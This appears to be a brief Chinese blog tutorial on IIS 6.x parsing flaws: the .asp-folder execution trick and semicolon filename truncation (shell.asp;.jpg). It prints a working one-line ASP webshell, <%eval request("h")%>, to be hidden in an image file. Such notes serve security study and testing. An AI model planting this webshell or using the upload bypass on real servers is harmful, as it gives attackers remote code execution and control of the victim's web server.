IIS解析漏洞

Zmxcl-0072024-12-23 14:15

IIS6.X

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>

#asp一句话

<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

相关推荐
Magic--14 分钟前
深入解析管道:最基础的进程间通信(IPC)实现
java·服务器·unix
爱丽_34 分钟前
Redis 分布式锁:SET NX、过期时间、续租、可重入、Redlock 与坑
数据库·redis·分布式
IT小崔39 分钟前
SqlSugar 使用教程
数据库·后端
GIS阵地1 小时前
QgsProviderMetadata 详解(基于 QGIS 3.40.13 API)
数据库·qt·arcgis·oracle·gis·开源软件·qgis
qq_366086221 小时前
sql server OUTER APPLY使用
数据库·sql·mysql
Sunshine for you1 小时前
使用Flask快速搭建轻量级Web应用
jvm·数据库·python
qwehjk20081 小时前
如何从Python初学者进阶为专家?
jvm·数据库·python
zzh0811 小时前
Mysql数据库备份与恢复笔记
数据库·笔记·mysql
陳10301 小时前
Linux:基础开发工具
linux·运维·服务器
武藤一雄1 小时前
C# 设计模式大全(第一弹|7种)
microsoft·设计模式·微软·c#·.net·.netcore
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05OpenClaw 使用和管理 MCP 完全指南06“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程09班级宠物园部署指南10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services